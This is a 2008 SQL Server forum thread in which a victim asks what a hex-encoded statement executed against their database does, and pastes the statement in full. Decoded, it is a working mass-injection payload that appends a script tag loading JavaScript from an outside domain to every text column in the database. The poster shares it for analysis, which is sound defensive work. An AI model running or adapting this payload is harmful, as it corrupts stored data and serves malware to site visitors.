Talk About Network

Google


Register and Login
Nick
Password
Register create new account Sign up is FREE and you can post replies, new topics, bookmark posts and more!
Recover lost password


Data Bases > Microsoft SQL Server > Urgent: Deciphe...
Latest [ Topics | Posts ] Archive Post A New Topic Post a Reply
<< Topic < Post Post 1 of 18 Topic 11036 of 11221
 Post > Topic >>

Urgent: Deciphering binary code executed against the database

by anojjona@[EMAIL PROTECTED] May 12, 2008 at 05:00 PM

Hi,
  I need to figure out what some code that was maliciously executed
against a database does.  However, it's in a very strange format.  It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar.  It then
executes this variable.
   Is there any way to decipher or decompile this code?  Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
   Thanks!

   Here's the code:

DECLARE @[EMAIL PROTECTED]
 NVARCHAR(4000);
SET
@[EMAIL PROTECTED]
(0x4400450043004C00410052004500200040005400200076006100720063006800=
61007200280032003500350029002C0040004300200076006100720063006800610072002800=
320035003500290020004400450043004C0041005200450020005400610062006C0065005F00=
43007500720073006F007200200043005500520053004F005200200046004F00520020007300=
65006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D006500=
2000660072006F006D0020007300790073006F0062006A006500630074007300200061002C00=
73007900730063006F006C0075006D006E007300200062002000770068006500720065002000=
61002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900=
700065003D00270075002700200061006E0064002000280062002E0078007400790070006500=
3D003900390020006F007200200062002E00780074007900700065003D003300350020006F00=
7200200062002E00780074007900700065003D0032003300310020006F007200200062002E00=
780074007900700065003D00310036003700290020004F00500045004E002000540061006200=
6C0065005F0043007500720073006F00720020004600450054004300480020004E0045005800=
54002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00=
7200200049004E0054004F002000400054002C004000430020005700480049004C0045002800=
40004000460045005400430048005F005300540041005400550053003D003000290020004200=
4500470049004E00200065007800650063002800270075007000640061007400650020005B00=
27002B00400054002B0027005D00200073006500740020005B0027002B00400043002B002700=
5D003D0072007400720069006D00280063006F006E0076006500720074002800760061007200=
63006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C00=
73006300720069007000740020007300720063003D0068007400740070003A002F002F007700=
770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A007300=
3E003C002F007300630072006900700074003E00270027002700290046004500540043004800=
20004E004500580054002000460052004F004D00200020005400610062006C0065005F004300=
7500720073006F007200200049004E0054004F002000400054002C0040004300200045004E00=
4400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00=
720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00=
43007500720073006F007200
AS NVARCHAR(4000));

EXEC(@[EMAIL PROTECTED]
);




 18 Posts in Topic:
Urgent: Deciphering binary code executed against the database
 anojjona@[EMAIL PROTECTED  2008-05-12 17:00:52 
Re: Urgent: Deciphering binary code executed against the databas
 eisaacs@[EMAIL PROTECTED]  2008-05-12 17:24:41 
Re: Urgent: Deciphering binary code executed against the databas
 Matthias Klaey <mpky@[  2008-05-13 02:31:17 
Re: Urgent: Deciphering binary code executed against the databas
 eisaacs@[EMAIL PROTECTED]  2008-05-12 17:41:18 
Re: Urgent: Deciphering binary code executed against the databas
 anojjona@[EMAIL PROTECTED  2008-05-12 17:43:43 
Re: Urgent: Deciphering binary code executed against the databas
 Matthias Klaey <mpky@[  2008-05-13 03:18:19 
Re: Urgent: Deciphering binary code executed against the databas
 anojjona@[EMAIL PROTECTED  2008-05-12 17:46:54 
Re: Urgent: Deciphering binary code executed against the databas
 eisaacs@[EMAIL PROTECTED]  2008-05-12 17:52:35 
Re: Urgent: Deciphering binary code executed against the databas
 eisaacs@[EMAIL PROTECTED]  2008-05-12 18:06:10 
Re: Urgent: Deciphering binary code executed against the databas
 Eric <eisaacs@[EMAIL P  2008-05-12 18:25:54 
Re: Urgent: Deciphering binary code executed against the databas
 MacLeonard Starkey <se  2008-05-13 23:02:29 
Re: Urgent: Deciphering binary code executed against the databas
 MacLeonard Starkey <se  2008-05-13 23:08:34 
Re: Urgent: Deciphering binary code executed against the databas
 anojjona@[EMAIL PROTECTED  2008-05-12 22:37:28 
Re: Urgent: Deciphering binary code executed against the databas
 Pumba <takvinge@[EMAIL  2008-05-13 01:58:09 
Re: Urgent: Deciphering binary code executed against the databas
 anojjona@[EMAIL PROTECTED  2008-05-13 07:57:54 
Re: Urgent: Deciphering binary code executed against the databas
 Eric <eisaacs@[EMAIL P  2008-05-13 11:18:32 
Re: Urgent: Deciphering binary code executed against the databas
 anojjona@[EMAIL PROTECTED  2008-05-13 15:46:03 
Re: Urgent: Deciphering binary code executed against the databas
 Erland Sommarskog <esq  2008-05-14 22:05:10 

Post A Reply:
  Go here to Signup

AddThis Feed Button


About - Advertising - Contact - Frequently Asked Questions - Privacy Policy - Terms of Use - Signup
Contact
tan13V112 Wed Jul 9 0:38:21 CDT 2008.